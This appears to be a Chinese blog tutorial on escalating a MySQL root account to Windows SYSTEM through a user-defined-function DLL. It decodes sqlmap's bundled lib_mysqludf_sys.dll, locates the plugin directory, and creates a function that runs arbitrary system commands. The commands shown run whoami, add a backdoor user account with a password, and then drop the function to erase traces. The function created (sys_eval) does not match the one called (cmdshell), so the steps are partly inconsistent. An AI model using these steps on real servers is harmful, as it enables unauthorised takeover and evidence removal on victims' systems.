01
前言
udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。
02
思路
1.将udf文件上传到指定位置
sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,一定要选择对应系统的对应版本版本,否则会显示:Can‘t open shared library ‘udf.dll‘。尤其要注意
sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_
sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_
但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。
可以利用sqlmap 自带的解码工具cloak.py,进入到 sqlmap\extra\cloak\cloak 目录下,执行命令:
python ./cloak.py -d -i sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll
会在当前目录下生成一个解锁后的lib_mysqludf_sys.dll
通过以下命令查看mysql的运行环境
show variables like '%version%';
show variables like '%compile%';
或者
select @@version_compile_machine;
可以判断是在64为的cpu上运行了win32的系统,因此我们的mysql程序也是32位的。在使用udf.dll文件时应该使用windows系统下32位的文件
sqlmap中的udf文件提供的函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
有了udf文件,接下来就是利用各种办法上传到网站指定目录下
MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。
通过以下命令查看mysql版本
select @@version;
select version();
根据不同的版本号,将udf.dll文件上传到对应的目录下。
本人所测试的mysql版本是5.5.53因此需要将udf.dll文件上传到mysal/lib/plugin目录下;
可以通过以下命令查看plugin文件夹的绝对路径:
select @@plugin_dir;
本次只讨论udf提权,上传过程忽略
create function sys_eval returns string soname 'udf.dll';
select cmdshell ('whoami');
select cmdshell ('net user aaa abc123!@# /add');
消除痕迹
drop function sys_eval;
扫码关注
微信号:JIANJIEXX_
1213
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
